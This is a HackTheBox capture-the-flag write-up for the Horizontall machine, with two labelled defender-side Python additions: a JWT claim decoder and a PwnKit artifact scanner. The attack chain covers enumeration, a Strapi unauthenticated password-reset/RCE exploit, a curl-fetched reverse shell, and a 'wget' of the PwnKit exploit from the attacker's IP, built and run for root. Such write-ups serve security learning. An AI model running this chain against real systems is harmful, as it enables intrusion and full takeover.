# Horizontall

About this machine: HTB

Operating System: Linux

**Skills used**:

* Information Leakage
* Port Forwarding
* Strapi CMS Exploitation
* Laravel Exploitation

Methodology:

We run a first scan of the target.

```
nmap -T3 -sS -n -v 10.10.11.105 -oN first_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-27 20:05 EDT
Initiating Ping Scan at 20:05
Nmap scan report for 10.10.11.105
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds
Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.048KB)
```

Service scan with default script execution:

```
❯ nmap -sC -sV -T3 -sS -n -p22,80 -v 10.10.11.105 -oN SC_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-27 20:07 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:07
Host is up (0.14s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

We check what is running on port 80.

<figure><img src="/files/3dpj9cGBOSqvptFeL5r8" alt=""><figcaption><p>It shows nothing, perhaps because of virtual hosting</p></figcaption></figure>

<figure><img src="/files/SnHPfI5iDuGXDEdOFsk5" alt=""><figcaption><p>We try adding the host to our /etc/hosts to get something to show</p></figcaption></figure>

```
nvim /etc/hosts
```

<figure><img src="/files/2JNBWnGyxjhE5EMFQyz0" alt=""><figcaption><p>Now we can see the website</p></figcaption></figure>

We brute-force subdomains with gobuster.

```
❯ gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb/ -z -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:           http://horizontall.htb/
[+] Method:        GET
[+] Threads:       200
[+] Wordlist:      /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:    gobuster/3.6
[+] Timeout:       10s
[+] Append Domain: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
found: api-prod.horizontall.htb
```

<figure><img src="/files/10xaoL5txuAIy1GvMMFF" alt=""><figcaption><p>We visit the subdomain, first adding it to our /etc/hosts</p></figcaption></figure>

We enumerate directories on this host using gobuster.

```
❯ gobuster dir -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://api-prod.horizontall.htb -t 50 -z
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://api-prod.horizontall.htb
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin   (Status: 200) [Size: 854]
/users   (Status: 403) [Size: 60]
/reviews (Status: 200) [Size: 507]
```

We look at the paths found; in /reviews we find some interesting JSON.

<figure><img src="/files/RmMRWXilqhsM5KKLENMt" alt=""><figcaption><p>We obtained some usernames</p></figcaption></figure>

Now, with searchsploit, we try to find a vulnerability for Strapi.

```
searchsploit strapi

 Exploit Title                                                                      |  Path

Strapi 3.0.0-beta - Set Password (Unauthenticated)                                  | multiple/webapps/50237.py
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)                | multiple/webapps/50238.py
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)          | multiple/webapps/50239.py
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)            | nodejs/webapps/50716.rb
```

We save the exploit we liked most, in this case 50239, rename it and run it.

```
searchsploit -m multiple/webapps/50239.py

❯ python3 strapy.explout.py

[-] Wrong number of arguments provided
[*] Usage: python3 exploit.py

❯ python3 strapy.explout.py http://api-prod.horizontall.htb

[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzQ1ODAyOTUwLCJleHAiOjE3NDgzOTQ5NTB9.DJvjPjeiRDNxOatzY6tWiJTxhjKp-60AWINFYtHGBRk
```
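A note from the defender's side, added here and not part of the original writeup: the token printed above is a standard JWT, and its header and payload are only base64url-encoded, so anyone who sees it (in tool output, a log, a ticket) can read the claims without the signing secret. The Python below decodes the token from the page and turns it into the facts an incident responder needs to act on: whether it carries an admin claim, how long it is valid, and whether it has expired. It never verifies the signature (we have no secret), and the triage wording is an assumption of this example, not Strapi's own API.

```python
import base64
import json
from datetime import datetime, timezone

# Token exactly as printed in the exploit output above (copied from the writeup).
LEAKED_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzQ1ODAyOTUwLCJleHAiOjE3NDgzOTQ5NTB9."
    "DJvjPjeiRDNxOatzY6tWiJTxhjKp-60AWINFYtHGBRk"
)


def b64url_decode(segment: str) -> bytes:
    """Decode one base64url JWT segment, restoring the padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def inspect_jwt(token: str) -> dict:
    """Read header and payload of a JWT without verifying the signature.

    Reading the claims needs no secret at all, which is why a token that
    shows up in output or logs is already a finding on its own.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected three dot-separated JWT segments")
    header = json.loads(b64url_decode(parts[0]))
    payload = json.loads(b64url_decode(parts[1]))

    iat, exp = payload.get("iat"), payload.get("exp")
    lifetime_days = (exp - iat) / 86400 if iat is not None and exp is not None else None

    def to_iso(epoch):
        return datetime.fromtimestamp(epoch, tz=timezone.utc).isoformat() if epoch else None

    return {
        "alg": header.get("alg"),
        "user_id": payload.get("id"),
        "is_admin": bool(payload.get("isAdmin", False)),
        "issued_at": to_iso(iat),
        "expires_at": to_iso(exp),
        "exp_epoch": exp,
        "lifetime_days": lifetime_days,
        "signature_verified": False,  # we never had the secret; claims are untrusted
    }


def triage_findings(token: str, now_epoch: int) -> list:
    """Return the points an incident responder would raise for a leaked token."""
    info = inspect_jwt(token)
    findings = []
    if info["is_admin"]:
        findings.append("token carries an administrative claim (isAdmin=true)")
    if info["lifetime_days"] is not None and info["lifetime_days"] > 1:
        findings.append("long-lived token: valid for %.0f days" % info["lifetime_days"])
    if info["exp_epoch"] is not None and info["exp_epoch"] > now_epoch:
        findings.append("token has not expired yet; rotate the signing secret to invalidate it")
    return findings


if __name__ == "__main__":
    for key, value in inspect_jwt(LEAKED_TOKEN).items():
        print(f"{key:>20}: {value}")
    now = int(datetime.now(tz=timezone.utc).timestamp())
    for line in triage_findings(LEAKED_TOKEN, now_epoch=now):
        print("-", line)
```

Run as a script it shows the token is an HS256 admin token issued for 30 days. Because HMAC-signed tokens cannot be revoked individually, the practical response to a leaked one is to rotate the signing secret, which invalidates every outstanding token at once.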

We test the credentials and LOG IN SUCCESSFULLY.

<figure><img src="/files/ygSssSoi7LX5xNu3iVfm" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/G29fLfiZtVbkMtWJLA7J" alt=""><figcaption></figcaption></figure>

We check whether we can inject commands remotely from the terminal.

```
❯$> whoami
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
{"statusCode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}
```

It would not let us use nc, but we noticed that curl is allowed, so we create an index.html and stand up a simple Python web server so that, when the victim machine fetches the index with curl, a reverse shell is sent back to our listener.

<figure><img src="/files/vw2N1LeZoQTOlpQZeUwL" alt=""><figcaption></figcaption></figure>

We look for the flag.

```
strapi@horizontall:~/myapi$ cd /home

strapi@horizontall:/home$ ls
developer

strapi@horizontall:/home$ cd developer

strapi@horizontall:/home/developer$ ls
composer-setup.php
myproject
user.txt

strapi@horizontall:/home/developer$ cat user.txt
a7493a7702747ee7f8b4300f17a9a1fa
```

We have the first flag; now we look to escalate privileges.

We look for ways to escalate privileges and find the following:

```
strapi@horizontall:/home/developer$ which pkexec
/usr/bin/pkexec
```

It has pkexec and the make command, which will let us use an already known CVE.

We move into the temp directory:

```
strapi@horizontall:/home/developer$ cd /tmp/
```

We clone the CVE on our own machine (not the victim) to exploit the vulnerability:

```
git clone https://github.com/berdav/CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Receiving objects: 100% (92/92), 22.71 KiB | 394.00 KiB/s, done.
Resolving deltas: 100% (44/44), done.
```

We zip the exploit to send it to the victim machine:

```
zip -r comprimido.zip CVE-2021-4034/
```

Once the exploit is zipped, we bring the Python web server back up, fetch the file from the victim machine with wget, unzip the CVE, run make and execute the exploit.

<figure><img src="/files/YbnwJImDV2uwyXXMbnKD" alt=""><figcaption></figcaption></figure>

```
strapi@horizontall:~/myapi$ wget http://10.10.14.7/comprimido.zip
--2025-04-28 02:38:09--  http://10.10.14.7/comprimido.zip
Connecting to 10.10.14.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 52950 (52K) [application/zip]
Saving to: ‘comprimido.zip’
     0K .......... .......... .......... .......... ..........  96%  161K 0s
    50K .                                                     100% 1.12M=0.3s
2025-04-28 02:38:09 (166 KB/s) - ‘comprimido.zip’ saved [52950/52950]

strapi@horizontall:~/myapi$ unzip comprimido.zip

strapi@horizontall:~/myapi$ cd CVE-2021-4034

strapi@horizontall:~/myapi/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
strapi@horizontall:~/myapi/CVE-2021-4034$ ./cve-2021-4034

whoami
root
```
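From the defender's side, the make output above is itself a useful indicator: the build step leaves behind a directory literally named `GCONV_PATH=.` and a `gconv-modules` file in a user-writable directory, and neither belongs anywhere outside the system iconv library path. The Python below, an added example that is not part of the writeup or of the exploit repository, walks a directory tree and reports those two artifacts. The throwaway tree it builds for the demo and the allowlist of system library prefixes are constructed assumptions; on a real host you would point `hunt_pwnkit_artifacts` at `/tmp`, `/home` or `/dev/shm` with the default allowlist.

```python
import os
import tempfile

# Names taken from the make output in the writeup: the build step creates a
# directory literally named "GCONV_PATH=." and a "gconv-modules" file that
# registers a fake iconv module, both inside a user-writable directory.
GCONV_DIR_PREFIX = "GCONV_PATH="
GCONV_MODULES = "gconv-modules"

# Where a genuine gconv-modules is expected on a Linux host; anything else is
# worth a look. Assumed defaults; adjust for the distribution being checked.
DEFAULT_ALLOWLIST = ("/usr/lib/", "/usr/lib64/", "/lib/", "/lib64/")


def hunt_pwnkit_artifacts(root: str, allowlist=DEFAULT_ALLOWLIST) -> list:
    """Walk `root` and report PwnKit-style staging artifacts.

    Each finding is {"kind": ..., "path": ...}. Directory names beginning with
    "GCONV_PATH=" are reported unconditionally; a file named "gconv-modules"
    is reported unless it lives under one of the allowlisted system prefixes.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            if name.startswith(GCONV_DIR_PREFIX):
                findings.append({"kind": "gconv_path_dir", "path": os.path.join(dirpath, name)})
        for name in filenames:
            full = os.path.join(dirpath, name)
            if name == GCONV_MODULES and not full.startswith(tuple(allowlist)):
                findings.append({"kind": "gconv_modules_file", "path": full})
    return sorted(findings, key=lambda f: f["kind"])


def build_demo_tree() -> str:
    """Construct a throwaway tree mirroring the writeup's build directory (demo data)."""
    root = tempfile.mkdtemp(prefix="pwnkit-hunt-")
    staging = os.path.join(root, "CVE-2021-4034")
    os.makedirs(os.path.join(staging, "GCONV_PATH=."))
    with open(os.path.join(staging, GCONV_MODULES), "w") as fh:
        fh.write("module UTF-8// PWNKIT// pwnkit 1\n")
    # A legitimate gconv-modules under the system library path must not be reported.
    legit_dir = os.path.join(root, "usr", "lib", "x86_64-linux-gnu", "gconv")
    os.makedirs(legit_dir)
    with open(os.path.join(legit_dir, GCONV_MODULES), "w") as fh:
        fh.write("# distribution-provided module list (constructed sample)\n")
    # Unrelated user content, also must not be reported.
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("nothing to see\n")
    return root


def run_demo() -> list:
    """Scan the constructed tree with the allowlist rebased onto it."""
    root = build_demo_tree()
    allowlist = tuple(os.path.join(root, p.lstrip("/")) for p in DEFAULT_ALLOWLIST)
    return hunt_pwnkit_artifacts(root, allowlist=allowlist)


if __name__ == "__main__":
    for finding in run_demo():
        print(f"{finding['kind']:<20} {finding['path']}")
```

The scan reports exactly the two staged artifacts and ignores both the distribution's own `gconv-modules` and unrelated files. Name-based hunting like this is cheap to schedule and complements the real fix, which is patching polkit.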

And we have gained root access; now we look for the last flag.

```
cd /root

ls
boot.sh
pid
restart.sh
root.txt

cat root.txt
86dc856f7d9e662dced3806d29391a9d
```

And with that we conclude this machine.
